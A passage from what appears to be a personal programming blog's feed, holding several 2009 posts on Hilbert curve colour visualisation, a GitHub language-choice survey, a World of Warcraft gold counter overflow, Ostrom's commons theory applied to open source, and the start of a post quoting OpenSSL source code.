</th>
<th>
3-bit
</th>
<tr>
<td valign="top">
<img src="hilbert2d-o1.png" alt="Hilbert 2d O1"/>
</td>
<td valign="top">
<img src="hilbert3d-o1.png" alt="Hilbert 3d O1"/>
</td>
</tr>
</tr>
</table>
<p>Voila, the Order 1 Hilbert curves in 2 and 3 dimensions! A bit of pondering
shows that this generalises to any dimension - if we have a hypercube with
dimensions 1x1x1..., the Gray code will traverse all the vertices of the cube
by changing only one dimension at a time. Specifically, we can say that the
N-bit Gray code is a Hilbert order traversal of the vertices of an
N-dimensional hypercube. Effectively, this means that we can now draw the Order
1 Hilbert curve for any dimension - so let's refresh our memories of how the
Order 1 curve relates to the higher orders.</p>
<table class="spacertable">
<tr>
<th> O1 </th>
<th> O2 </th>
<th> O3 </th>
</tr>
<tr>
<td>
<img src="hilbert2d-o1-marked.png" alt="Hilbert 2d O1"/>
</td>
<td>
<img src="hilbert2d-o2-marked.png" alt="Hilbert 2d O2"/>
</td>
<td>
<img src="hilbert2d-o3-marked.png" alt="Hilbert 2d O3"/>
</td>
</tr>
</table>
<p>Notice that as we move from one order to the next, we replace each vertex with
a sub-curve that has the same shape as the <strong>O1</strong> traversal. I've marked one
path through this recursive process in the images above, showing the subcurve
for the upper-left vertex in every step of the recursion. At every step, we
also need to transform the subcurve through rotation and reflection to make
sure that its start matches the end of the previous subcurve, and its end
matches the beginning of the next subcurve. This process generalises trivially
to N dimensions. Since the <strong>O1</strong> curve is just a Gray code traversal of the
N-dimensional cube, we can think of the Order M Hilbert curve as a collection
of hypercubes nested M deep.</p>
<p>Now, let's see if we can use this construction process to figure out the
co-ordinates of a point, given the offset along the Hilbert curve. We'll ignore
the rotations and reflections for the moment. We start with the <strong>O1</strong> curve of
dimension N, and the N most significant bits of the offset. By checking which
vertex of the hypercube this maps to, we can peel off the most significant bit
of each co-ordinate. For example, if we wanted to locate offset 63 in the
2-dimensional Order 3 curve (the upper-left corner), our first two bits would
be (1, 1). This is the fourth point in the Gray code traversal of the
hypercube, which gives us the upper-left quadrant of the <strong>O1</strong> cube. We now
know that the most significant bit of our X co-ordinate is 0, and the most
significant bit of our Y co-ordinate is 1. Doing the same thing for the
matching sub-hypercube in the <strong>O2</strong> curve will give us the next bit, and we
can drill down through the hypercubes in this way peeling off one bit of each
co-ordinate, until we have all M bits. This process also works in reverse - if
we start with a set of co-ordinates, we can drill down through the hypercubes,
determining N bits of the curve offset at every step. So, generally, at every
step of the Gray code recursion we get a nested hypercube of dimension N, and N
bits of co-ordinate or offset information. Finally, we need to deal with the
rotations and reflections required to make the heads and tails of the Gray code
subcurves match up. We'll need to perform this transformation at every step,
before we extract our information bits. All we need is a way to rotate and
reflect a given hypercube to make its beginning and end match up with its
position on the curve. The transform required turns out to map to a simple set
of bit operations described in Section 2.3.1 of Hamilton's paper.</p>
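<p>In the 2-dimensional case the whole drill-down - including the per-level rotations and reflections - collapses into a handful of bit operations. Here's a sketch of the well-known 2-d formulation (not Hamilton's N-dimensional algorithm, and the curve's orientation may differ from the images above):</p>

```python
def d2xy(order, d):
    # Convert an offset d along the 2-d Hilbert curve of the given order
    # into (x, y) co-ordinates, consuming two bits of d per level.
    x = y = 0
    s = 1
    while s < (1 << order):
        rx = 1 & (d // 2)
        ry = 1 & (d ^ rx)
        if ry == 0:                       # rotate/reflect this quadrant so
            if rx == 1:                   # the sub-curve's endpoints line
                x, y = s - 1 - x, s - 1 - y  # up with its neighbours
            x, y = y, x
        x += s * rx
        y += s * ry
        d //= 4
        s *= 2
    return x, y

print([d2xy(1, d) for d in range(4)])  # [(0, 0), (0, 1), (1, 1), (1, 0)]
```

<p>Every pair of consecutive offsets maps to adjacent cells - the defining property of the Hilbert curve - and running the loop in reverse gives the co-ordinates-to-offset direction.</p>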
<p>And that's it - using this general process, we can now calculate co-ordinates
or offsets for points on an N-dimensional Hilbert curve. Hopefully, I've
managed to give some intuition for how this algorithm works, but I've glossed
over pretty much all the details. See the original paper or the code I'm
publishing for specifics. I should also note in passing that this is just one
way to draw the Hilbert curve - at higher dimensions there are many, many
different well-formed Hilbert curves.</p>
<h2 id="a-portrait-of-the-hilbert-curve-as-a-young-fruit-salad">A portrait of the Hilbert curve as a young fruit salad</h2>
<p>At last we are in a position to traverse the 3-dimensional RGB cube in Hilbert
order, and have another stab at visualising the 2d Hilbert curve.</p>
<div class="media">
<a href="hilbert-hilbert-fullsize.png">
<img src="hilbert-hilbert-small.png" />
</a>
<div class="subtitle">
Hilbert on Hilbert
</div>
</div>
<p>Ladies and gentlemen, I present a Hilbert curve traversal of the
three-dimensional RGB colour space, projected onto a two-dimensional Hilbert
curve covering the plane. I think it's absolutely damn beautiful. Like some
weird piece of abstract art - a Kandinsky or perhaps a Pollock - the more you
look at this image, the more structure you see. If you divide it into quadrants,
and sub-quadrants, and sub-sub-quadrants, you can trace the path of the Hilbert
curve at every level of recursion by following the flow of colours (use the 2d
Hilbert curves elsewhere in this post for reference if you're having trouble).
If you're looking at the full-size image, this works even at very large
magnifications, until the human ability to perceive colour differences starts to
fail. Incredibly, this image contains <em>exactly</em> the same set of colours as the
unattractive Zigzag visualisation at the start of the post - the only difference
is the way the colours are arranged. This is so remarkable that you might want
to verify this yourself using the colour analysis functionality of your
favourite image editor (make sure you use the full-size images for best effect).
We've also achieved the goal we set out with - the clustering properties of the
2d Hilbert curve are directly visible as patches of similar colour.</p>
<p>By the way - if Hilbert curves float your boat, you may also be interested in a
previous post of mine, in which I <a href="https://corte.si/posts/code/hilbert/explorer/">visualise an IP geolocation database with
Hilbert curves</a>.</p>
<h2 id="the-code">The code</h2>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">git</span><span style="color:#c0c5ce;"> clone git://github.com/cortesi/scurve.git
</span></code></pre>
<p>I've released the code used to render the images in this article as a Python
project called <a href="http://github.com/cortesi/scurve">scurve</a> (for space-filling
curve). This project aims to be a collection of clear implementations of
algorithms related to space-filling curves, together with a set of tools for
visualising them. If you're interested in this kind of thing keep an eye on the
project - I plan to add more interesting goodies in the next few weeks.</p>
The impact of language choice on github projects
2009-12-15T00:00:00+00:00
https://corte.si/posts/code/devsurvey/
<p>Although I spend a lot of my play-time fooling about with other languages, my
professional and released code consists of Python, C, C++ and, alas, Javascript.
I've lived in this tiny corner of the magic garden of modern software
development for 10 years, and I'm itching to strike out in a different direction
for my next project. With this in mind, I've started to wonder about the impact
of language choice on the development process. Are there major differences
between projects in different languages? Is it possible to quantify these
differences? I decided to try to gather some hard numbers. I started by writing
a small script to watch the <a href="http://github.com/timeline">public timeline</a> on
<a href="http://www.github.com">github</a>. Over a period of weeks, I collected a list of
about 30 thousand active projects. Using the github API, I eliminated projects
with fewer than 3 watchers, on the basis that these are likely to be small
personal repositories like dotfiles, programming exercises and so forth. After
this, I was left with some 5000 repositories, which I checked out, giving me
about 55G of data to work with. The next step was to analyse the data,
extracting commits, committers and line counts for each file type contained in
each project. Lastly, I got rid of duplicate projects by looking for matching
commit hashes. From start to end, this process took more than a week to
complete. The end result is a database consisting of 3 400 repositories,
20 000 authors, and 1.5 million commits. I'm releasing the dataset for others to
play with - see the bottom of this post for information.</p>
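<p>The de-duplication step can be sketched as follows - a hypothetical reconstruction, not the actual survey script: treat two repositories as duplicates (forks or mirrors) if they share any commit hash, and keep only the first one seen.</p>

```python
def dedupe_repos(repo_hashes):
    # repo_hashes maps a repository name to the set of commit hashes it
    # contains (e.g. collected with `git log --format=%H`). A repository
    # is kept only if it shares no hash with an already-kept repository.
    seen, kept = set(), []
    for repo, hashes in repo_hashes.items():
        if seen.isdisjoint(hashes):
            kept.append(repo)
            seen.update(hashes)
    return kept

print(dedupe_repos({
    "upstream": {"a1", "b2", "c3"},
    "fork":     {"a1", "b2", "d4"},   # shares history with upstream
    "other":    {"e5"},
}))  # ['upstream', 'other']
```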
<p>The rest of this post takes a basic look at the numbers for 12 languages. I had
to leave some out for lack of data. Haskell, for example, didn't make the cut
with only 18 projects. Ah, well.</p>
<p>Let's look at the numbers.</p>
<h2 id="the-basics">The Basics</h2>
<p>Let's start with a quick overview of the basics of the dataset.</p>
<div class="media">
<a href="samplesize.png">
<img src="samplesize.png" />
</a>
<div class="subtitle">
Sample size
</div>
</div>
<p>First, the sample size. Clearly, github is very popular with the Ruby crowd,
with more than four times as many projects as Python, the runner-up. The sample
sizes for C#, Erlang and Scala are pretty small, so the results for these
languages aren't as firm as for the others.</p>
<div class="media">
<a href="median_contributors.png">
<img src="median_contributors.png" />
</a>
<div class="subtitle">
Median contributors
</div>
</div>
<p>This graph shows the median number of contributors to projects in each language.
The red line here and in the graphs below is the median for all projects in the
dataset. <strong>Most projects have around 3 contributors, with Perl and Java projects
having about 5, and Javascript and Objective C around 2</strong>.</p>
<div class="media">
<a href="median_commits.png">
<img src="median_commits.png" />
</a>
<div class="subtitle">
Median commits
</div>
</div>
<p>Here we see the median number of commits for projects in each language - in some
senses, we can view this as a proxy for project age. <strong>Most projects have around
75 commits.</strong> The Perl and C++ data, however, seems significant - projects in
these languages on average have a much longer commit history. I suspect that
this is due to a decline in the popularity of these languages. Recall that I
collected data only for projects that had recent commits. If fewer new projects
are created in C++ and Perl, we would expect projects in these languages to be
older, on average.</p>
<div class="media">
<a href="median_commitsize.png">
<img src="median_commitsize.png" />
</a>
<div class="subtitle">
Median commit size
</div>
</div>
<p>This chart shows the median commit size, in lines of code. We take the total
commit size to be the sum of lines inserted and the lines deleted, as reported
by "git log --shortstat". <strong>Most commits touch around 19 lines of code</strong>. The
C# outlier is probably due to the small sample set. I suspect that the
differences in this graph are a reflection of basic language verbosity, with
Objective C, C++ and Java being more verbose, and Perl, Python and Ruby being
less so.</p>
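<p>This measure is cheap to reproduce: the summary lines that "git log --shortstat" emits can be parsed with a couple of regular expressions. A sketch, using made-up sample lines:</p>

```python
import re
from statistics import median

def commit_size(shortstat):
    # "git log --shortstat" summary lines look like:
    #   " 3 files changed, 10 insertions(+), 2 deletions(-)"
    # and either the insertions or the deletions part may be absent.
    ins = re.search(r"(\d+) insertion", shortstat)
    dels = re.search(r"(\d+) deletion", shortstat)
    return (int(ins.group(1)) if ins else 0) + \
           (int(dels.group(1)) if dels else 0)

samples = [
    " 3 files changed, 10 insertions(+), 2 deletions(-)",
    " 1 file changed, 5 insertions(+)",
    " 2 files changed, 40 deletions(-)",
]
print(median(commit_size(s) for s in samples))  # 12
```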
<div class="media">
<a href="median_commit_files.png">
<img src="median_commit_files.png" />
</a>
<div class="subtitle">
median files touched per commit
</div>
</div>
<p><strong>Most commits touch about 4 files, with C++ touching somewhat more, and Perl,
Python and Ruby somewhat less.</strong> The C# outlier is probably due to small sample
size.</p>
<h2 id="the-contributors">The Contributors</h2>
<div class="media">
<a href="median_commits_per_contributor.png">
<img src="median_commits_per_contributor.png" />
</a>
<div class="subtitle">
Median commits per contributor
</div>
</div>
<p>This shows the median number of commits each contributor makes. <strong>The average
contributor makes about 5 commits to a project. C, Objective C and Ruby
developers contribute somewhat fewer; PHP, C#, Java and Javascript developers
somewhat more.</strong> I suspect the results for C and Ruby are due to
projects in these languages receiving more one-off contributions.</p>
<p>An average of only 5 commits - that's not much. Let's look at this from a
different perspective - graphing the percentage of the total commits to a
project made by contributors.</p>
<div class="media">
<a href="author_commit_quantile.png">
<img src="author_commit_quantile.png" />
</a>
<div class="subtitle">
% commits vs % contributors
</div>
</div>
<p>The percentage of commits by contributors is shown on the Y axis, and the
matching f-value on the X axis. An f-value of 25 is the bottom
<a href="http://en.wikipedia.org/wiki/Quartile">quartile</a>, 50 is the median, and 75 is
the upper quartile. Looking at the Python graph, for example, we can see that
the bottom 75% of contributors provided a bit less than 20% of the commits. The
shape of these graphs gives us our first take-away: <strong>For all languages, a small
fraction of the committers do the vast majority of the work.</strong> This won't be
news to anyone in the Open Source community. More interesting, though, is the
fact that <strong>C, C++ and Perl projects are significantly more "top-heavy" than
those in other languages, with a smaller core of contributors doing more of the
work.</strong></p>
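<p>Given per-contributor commit counts for a project, each point on these curves is a one-liner to compute. A sketch with illustrative data, not the survey's:</p>

```python
def commit_share(commit_counts, f):
    # Percentage of all commits made by the bottom f% of contributors,
    # with contributors sorted by ascending commit count.
    counts = sorted(commit_counts)
    k = int(len(counts) * f / 100)
    return 100.0 * sum(counts[:k]) / sum(counts)

# A toy project: four occasional contributors and one core developer.
counts = [1, 1, 1, 1, 16]
print(commit_share(counts, 80))  # 20.0 - the bottom 80% did a fifth of the work
```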
<h2 id="how-projects-evolve">How projects evolve</h2>
<div class="media">
<a href="contributorsXcommits.png">
<img src="contributorsXcommits.png" />
</a>
<div class="subtitle">
Contributors vs Commits
</div>
</div>
<p>This dot plot shows the total number of contributors vs the total number of
commits for each project. I've restricted the X and Y values - we're effectively
looking at the bottom-left corner of a larger dataset. The red line is a
<a href="http://en.wikipedia.org/wiki/Local_regression">loess</a> fitted curve. Over a
large number of projects, we can consider the number of commits to be a measure
of time - the graph effectively shows how quickly projects tend to accumulate
contributors over their lifespan. <strong>Ruby projects recruit contributors
astoundingly well, with Python a close second. Java, Javascript and PHP
projects, on the other hand, do particularly badly.</strong> The fact that the fitted
curve is a nice straight line with a consistent slope shows that these results
hold for young and old projects alike. Note that the Scala data is not
significant - that nice straight line is an extrapolation by the curve-fitting
algorithm, not something backed by the data.</p>
<div class="media">
<a href="commit_age.png">
<img src="commit_age.png" />
</a>
<div class="subtitle">
Commit age
</div>
</div>
<p>This graph shows the number of commits per day, over the first 300 days of a
project's life. To prevent skew, I only included projects that are 300 days or
older. The red line is a smoothed curve. <strong>C and Perl projects show a marked
decline in activity over their first year.</strong> I suspect that the Perl result is
due to the fact that it becomes harder and harder to contribute to a Perl
codebase, the bigger it gets. The C result is more of a mystery.</p>
<h2 id="the-silly">The Silly</h2>
<p>And now for something silly.</p>
<div class="media">
<a href="swearwords.png">
<img src="swearwords.png" />
</a>
<div class="subtitle">
Swearwords per 1000 commits
</div>
</div>
<p>This shows the number of swearwords used per 1000 commits. Objective C and Perl
programmers are the most foul-mouthed. Java coders are more restrained, possibly
because the language is more corporate, and they're afraid of having their pay
docked.</p>
<h2 id="the-caveats">The Caveats</h2>
<p>There are all sorts of reasons why you should take all of this with a grain of
salt. There are many factors that make github projects atypical - not least of
which is the use of Git for source control. The way that I collected data skews
the dataset in favor of projects with recent commits - unfortunately dead
projects aren't included. I detected a project's primary language purely based
on line count by file extension. Due to the large number of projects that
include Javascript libraries in their repos wholesale, I had to apply a
fudge-factor weighting to .js files to get reasonably sensible results.</p>
<h2 id="you-can-play-too">You can play too</h2>
<p>I had fun playing with this dataset, and I've barely scratched the surface of
what could be done with it. I'll probably squeeze another blog post or two out
of the data, but in the meantime, I'm making the full database available so
people can point out the many mistakes and shortcomings of my analysis. At the
time of writing, I still have the checked out repositories, so if you have
suggestions for refinements or expansions to the data, let me know.</p>
<p>You can check the database out <a href="http://github.com/cortesi/devsurvey">here</a>. Be
warned, though - it's about 100mb of data.</p>
Overflowing World of Warcraft's gold counter
2009-12-11T00:00:00+00:00
https://corte.si/posts/wow/beating-the-bank/
<div class="media">
<a href="overflow.jpg">
<img src="overflow.jpg" />
</a>
<div class="subtitle">
Bank Overflow
</div>
</div>
<p>It's a little known fact, but my only vice... Well, one of my <em>few</em> vices...
Cough. <em>Amongst my vices</em> is the fact that I play <a href="http://www.worldofwarcraft.com/">World of
Warcraft</a> with a small group of real-life
friends. As WoW habits go, mine is a very mild one - I don't often have time to
play more than one night a week. On the one night I do have, I want to raid,
not grind for gold to service endless repair bills. Irked by my situation, I
did what any red-blooded programmer would do. I wrote some code to collect
information on auction house price movements, analysed my data, and implemented
a Secret Trading Strategy in the form of a Super Secret Addon (which operates,
of course, entirely within WoW's terms of service). This has been successful
beyond the wildest dreams of avarice - I spend about 5 minutes a day buying and
selling the auctions recommended by the SSA, and I make enough to bankroll my
entire guild.</p>
<p>In fact, I just noticed that I have managed to overflow the "Total gold
acquired" counter in my stats tab. Turns out that WoW stores this figure as a
32-bit signed integer, expressed in copper. WoW now thinks I've earned
-1981224360 copper in total, something that can be achieved by earning more than
230 000 gold.</p>
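<p>The arithmetic is easy to check - undoing the 32-bit wrap-around recovers the real total, with 1 gold being 10 000 copper:</p>

```python
INT32_MAX = 2**31 - 1            # 2147483647 - the counter's ceiling

reported = -1981224360           # the value shown in the stats tab
actual_copper = reported + 2**32 # undo the signed 32-bit wrap-around
gold = actual_copper // 10_000   # 100 copper per silver, 100 silver per gold

print(actual_copper)             # 2313742936 - comfortably past INT32_MAX
print(gold)                      # 231374: indeed more than 230 000 gold
```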
Elinor Ostrom, the commons problem and Open Source
2009-12-10T00:00:00+00:00
https://corte.si/posts/opensource/ostrom/
<div class="media">
<a href="bigstump.jpg">
<img src="bigstump.jpg" />
</a>
<div class="subtitle">
Logging in Tasmania
</div>
</div>
<p>In 1968, <a href="http://en.wikipedia.org/wiki/Garrett_Hardin">Garrett Hardin</a> coined
the term <a href="http://www.sciencemag.org/cgi/content/full/162/3859/1243">"Tragedy of the
Commons"</a> to describe
the economic mechanism that drives humans to destroy common resources. The
tragedy applies whenever a common resource is "subtractable" - that is, if use
of a resource subtracts from it, making what's been extracted unavailable to
others. While the full benefit of appropriating the resource goes to the user,
the cost is shared among everyone. The consequence is that for a self-interested
user of the resource, the benefits of increasing use will always outweigh the
costs, even if the resource is ultimately destroyed in the process. Central to
this is the problem of freeloaders - even if the vast majority of users use a
resource sustainably, a small number of opportunistic freeloaders can quickly
soak up the common benefit. The conventional economic view - first expressed by
Hardin himself - is that there are two ways to solve the commons problem:
privatising the resource so an owner with a direct interest can govern its use,
or imposing regulation from "outside" the system. It's interesting to see, then,
that this year's Nobel Prize in Economics went to <a href="http://en.wikipedia.org/wiki/Elinor_Ostrom">Elinor
Ostrom</a>, someone who has made a name
arguing against this fatalistic conclusion. Ostrom and her collaborators have
produced a huge literature studying commons that follow a third path -
consensual, self-generated governance that limits use to sustainable levels.</p>
<p>At the heart of Ostrom's work is a simple question - how does self-governance
arise? She approaches this problem with a simple equation describing the
cost-benefit analysis of an individual considering whether to participate in
communal governance. I've modified it slightly for this post - you can find the
original in the paper <a href="http://www.scielo.br/pdf/asoc/n10/16883.pdf">"Reformulating the
Commons"</a>:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">BN > BE + C
</span></code></pre>
<p><strong>BN</strong> is the benefit derived under a new (presumably communal) governance
strategy, <strong>BE</strong> is the benefit derived under the existing (presumably
non-communal) strategy, and <strong>C</strong> is the cost associated with switching. It's as
simple as that: the benefit of participating has to exceed the cost. In essence,
Ostrom's work on the commons explores the panoply of ways in which communities
encourage participation in commons governance by modifying this equation through
rewards, penalties and social norms. There's no single successful strategy, and
the ones that do work rely on concepts like trust, reciprocity, and the types of
institutional structures and individuals involved. Additional complexity comes
from the interactions between subsets of users - the equation can be different
for every user, and coalitions and factions are common. The huge diversity of
solutions means that Ostrom's work is dirtier and more empirical than much of
economics, and certainly far removed from the world of identical rational actors
in Hardin's original analysis.</p>
<p>It's interesting to consider how this line of thought applies to Open Source
projects. Software is not a classical <a href="http://en.wikipedia.org/wiki/Common_pool_resource">common pool
resource</a>, because it's not
subtractable - there's no cost to the users or developers of a project if I
choose to use it. Nonetheless, an Open Source project is definitely a commons,
in the sense that it is a community resource that thrives or starves depending
on contributions from its members. The participants in this type of commons are
the pool of potential contributors, rather than the pool of potential
appropriators. In the same way that using a common pool resource applies a
shared penalty to everyone, a contribution to the software commons benefits
everyone. This type of non-subtractive (additive?) commons has its own version
of the freeloader problem - it pays for a contributor to hang back and wait for
someone else to add a needed feature, rather than go to the expense of adding it
themselves. If the contributor is a company, it might be beneficial to maintain
a competitive advantage by not contributing a change back to the community, even
if the work has already been done. Open Source projects face an inverted form of
the commons problem, which can be expressed in a modified version of Ostrom's
commons equation:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">BC > BN + C
</span></code></pre>
<p>Here, <strong>BC</strong> is the benefit of contributing, which has to outweigh the cost of
contributing (<strong>C</strong>) plus the benefit of not contributing (<strong>BN</strong>). The Open
Source world has produced an immensely sophisticated set of norms and
institutions around the terms of this equation, resulting in some of the most
successful self-governance structures on the planet. I'd argue that most of the
institutional work in Open Source over the last few decades has focused on
reducing <strong>C</strong> - a lot of the basic technology and accompanying social norms
used in Open Source development (mailing lists, bug trackers, version control
systems, communications protocols) is lubrication to reduce the cost of
contributing. I think you could even make a plausible case that much of what
drives the Internet is just a side-effect of Open Source projects trying to
reduce <strong>C</strong>.</p>
<p>Another interesting train of thought is spurred by the factor <strong>BN</strong> - the
benefit of not contributing. This nicely illuminates the fundamental difference
between commercial and individual contributors - for individual contributors
without commercial interests, <strong>BN</strong> is almost always 0. For commercial
contributors, however, this term can be large. Consequently, we would expect
projects where commercial contribution is important to have measures that aim to
reduce <strong>BN</strong> - penalties that minimise the benefit of not contributing to the
project. The outstanding example here is the Linux kernel project, which has
followed a very successful two-fold path to reduce <strong>BN</strong>. The first, of course,
is licensing - the GPL imposes stiff penalties (paid in terms of public outcry
and possible legal consequences) on those failing to contribute code back to the
project under many circumstances. The terms of the GPL do not cover all types of
use, however, so there is a second tier of operational penalties for code that
is license compliant, but not contributed back to the project. To quote <a href="http://en.wikipedia.org/wiki/Greg_Kroah-Hartman">Greg
Kroah-Hartman</a> in a <a href="http://howsoftwareisbuilt.com/2009/11/18/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer/">recent
interview</a>:</p>
<blockquote>
<p>Because of our huge rate of change, [drivers] pretty much have to be in the
kernel tree. Otherwise, keeping a driver outside the kernel is technically a
very difficult thing to do, because our internal kernel APIs change very,
very rapidly.</p>
</blockquote>
<p>It's interesting to consider whether this last penalty is intentional or not.
There are good technical reasons not to make any stability guarantees for
internal APIs, but at the same time I'm sure that many kernel hackers are very
aware of the fact that a rapidly-changing internal API compels companies to
contribute code. I don't think it's a coincidence that the most successful Open
Source project in the world has adopted strategies to penalize potential
contributors for not donating code to the community. Reducing <strong>BN</strong> is one of
the reasons why Linux has a vastly greater commercial contribution than, say,
FreeBSD, and is therefore a much more vibrant and active project.</p>
Why I subscribe to the Economist
2009-11-08T00:00:00+00:00
https://corte.si/posts/media/why-i-subscribe-to-the-economist/
<div class="media">
<a href="economist.jpg">
<img src="economist.jpg" />
</a>
<div class="subtitle">
Economist
</div>
</div>
<div class="media">
<a href="guardian.jpg">
<img src="guardian.jpg" />
</a>
<div class="subtitle">
Guardian
</div>
</div>
<p>I've been a long-time reader of two international papers - the <a href="http://www.guardianweekly.co.uk/">Guardian
Weekly</a> and the
<a href="http://www.economist.com/">Economist</a>. Over the last year, these two papers
have had startlingly different performance results - the Guardian Media Group
posted a record <a href="http://www.pressgazette.co.uk/story.asp?storycode=44075">loss of $150
million</a> for the year
ending in June, while the Economist reported a record operating <a href="http://www.economistgroup.com/our_news/press_releases/2009/results_for_the_year_ended_march_31st_2009.html">profit of $92
million</a>
in the year ending in March. I have played my own tiny part in producing this
outcome. I used to buy both the Economist and the Guardian Weekly religiously
every week - today, I'm a paid-up subscriber to the Economist, and no longer buy
the Guardian at all. So, how did the Guardian lose my dime entirely, while The
Economist converted me from a news-stand purchaser to a subscriber? The answer
to the first part of the question is simple: I no longer buy the Guardian Weekly
because most of their content is available on the <a href="http://www.guardian.co.uk">Guardian
website</a> for free (even the crosswords, which I still
print out and do over breakfast). I just have no incentive to fork out money for
a piece of paper containing articles I've already read. The Economist has played
the game rather more cleverly. Editorial pieces that are likely to generate
inbound links are released for free on their website, but the bulk of their
factual reporting remained behind a paywall. This alone would not have been
enough to induce me to part with my hard-earned doubloons - if they stopped
there, I would probably just have switched to free (though probably lower
quality) alternatives. They really hooked me by offering a complete,
professionally read audio edition, delivered promptly through an RSS feed at the
same time as the print edition. This means that my subscription buys me about 8
hours of excellent audio content every week. By contrast, the rather quaint
perk I would receive if I subscribed to the Guardian Weekly is a "digital paper"
edition - essentially a series of large zoom-able images of the laid-out paper
that I can't cut and paste from, link to, or even read comfortably.</p>
<p>There's been a fair bit of head-scratching by pundits trying to explain The
Economist's unexpected success. Michael Hirschorn from the Atlantic <a href="http://www.theatlantic.com/doc/200907/news-magazines">just seems
terribly confused</a>,
claiming that the Economist "has never had much digital savvy", and concluding
inexplicably that it must all just be luck. <a href="http://www.niemanlab.org/2009/09/clay-shirky-let-a-thousand-flowers-bloom-to-replace-newspapers-dont-build-a-paywall-around-a-public-good/">Clay Shirkey
thinks</a>
that the Economist is a niche financial news publication, and that its audience
of "traders and business people" are willing to pay for specialist content when
other people are not. Both of these opinions are quite wrong. The Economist has
played a cunning strategic game with considerable <em>sang-froid</em>, and has shown
much more savvy in producing monetizable online material than the Guardian (or
indeed the Atlantic). Despite its name the Economist is in fact a
general-interest international newspaper, with much more space devoted to news
and politics than business and economics. The real answer is, I think, somewhat
simpler: the Economist didn't abandon the basic rules of business - exchanging
something of value for currency - when they moved online.</p>
<p>All of this reminds me of a recent blog post by <a href="http://blog.amandapalmer.net/post/200582690/why-i-am-not-afraid-to-take-your-money-by-amanda">Amanda
Palmer</a>,
lead singer for the Dresden Dolls. She's fairly well known for shamelessly
monetizing her fanbase, an attitude she says has roots in her past as a street
performer. She makes a convincing case that artists have historically been
insulated by record companies from actually having to ask their fans for money.
Putting your hat out and asking for coins is seen as grubby - an attitude that
is going to have to change as record companies exit stage left and the
connection between performers and audiences becomes more direct. A somewhat
analogous thing is now happening to many news publishers - the most obvious
alternative to selling eyeballs to advertisers is to put on a good show, and ask
your audience for money. In my case, that's exactly what the Economist did -
they offered me a distinctive benefit, and asked me to pay for it. And,
apparently like many other Economist subscribers, I was happy to.</p>
Reading Code: In praise of superficial beauty
2009-11-04T00:00:00+00:00
https://corte.si/posts/code/reading-code/
<p>Every good programmer has gone through this. You discover a new tool, and it
seems shapely and fit for purpose. You start using it, tentatively at first,
gradually getting more and more used to its quirks and features. Over time,
trust between you grows, and your casual friendship blossoms into something
deeper. The program becomes part of that sacred subset of utilities you can't
imagine yourself without. All is bliss... Then, one day, you decide to look at
the code. Maybe you want to extend it, maybe you're just curious. The moment
you fire up your editor on the first source file, you sense that something is
wrong. Without reading a line, you notice a certain visual complexity to the
code - something to do with deeply nested and over-long functions. Looking
closer, you quickly realise that tangles of ifdefs snake through the source like
a canker. Weird indentation and non-idiomatic constructs are everywhere. The
project's structure sucks - there's no proper component isolation, its innards
are a nest of subtle and devious co-dependencies. Beneath the skin of the
streamlined program you thought you were using lies a grotesque, bloated,
unmaintainable monstrosity. You're heartbroken - you've trusted this tool for
years, and now it betrays you like this. It was all a lie - nothing will ever be
the same again...</p>
<p>I know from personal experience that this is a very traumatic process, so it's
with great sympathy that I read a recent article by Marco Peereboom - an
evocative and haunting lament with the poetic title <a href="http://www.peereboom.us/assl/html/openssl.html">"OpenSSL is written by
monkeys"</a>. Marco modestly
claims not to be a great programmer, but he <em>is</em> a contributor to OpenBSD, a
project that has a frankly
<a href="http://en.wikipedia.org/wiki/Theo_de_Raadt">psychotic</a> focus on code quality.
So, let's see what a graduate of the OpenBSD Academy of Programming makes of the
OpenSSL codebase, as illustrated by this illuminating extract:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">#ifndef</span><span style="color:#c0c5ce;"> OPENSSL_NO_STDIO
</span><span style="color:#65737e;">/*!
* Load CA certs from a file into a ::STACK. Note that it is somewhat misnamed;
* it doesn't really have anything to do with clients (except that a common use
* for a stack of CAs is to send it to the client). Actually, it doesn't have
* much to do with CAs, either, since it will load any old cert.
* \param file the file containing one or more certs.
* \return a ::STACK containing the certs.
*/
</span><span style="color:#bf616a;">STACK_OF</span><span style="color:#c0c5ce;">(X509_NAME) *</span><span style="color:#8fa1b3;">SSL_load_client_CA_file</span><span style="color:#c0c5ce;">(</span><span style="color:#b48ead;">const char </span><span style="color:#c0c5ce;">*</span><span style="color:#bf616a;">file</span><span style="color:#c0c5ce;">)
{
BIO *in;
X509 *x=</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">;
X509_NAME *xn=</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">;
</span><span style="color:#bf616a;">STACK_OF</span><span style="color:#c0c5ce;">(X509_NAME) *ret = </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">,*sk;
sk=</span><span style="color:#bf616a;">sk_X509_NAME_new</span><span style="color:#c0c5ce;">(xname_cmp);
in=</span><span style="color:#bf616a;">BIO_new</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">BIO_s_file_internal</span><span style="color:#c0c5ce;">());
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">((sk == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) || (in == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">))
{
</span><span style="color:#bf616a;">SSLerr</span><span style="color:#c0c5ce;">(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);
</span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(!</span><span style="color:#bf616a;">BIO_read_filename</span><span style="color:#c0c5ce;">(in,file))
</span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">(;;)
{
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">PEM_read_bio_X509</span><span style="color:#c0c5ce;">(in,&x,</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">,</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
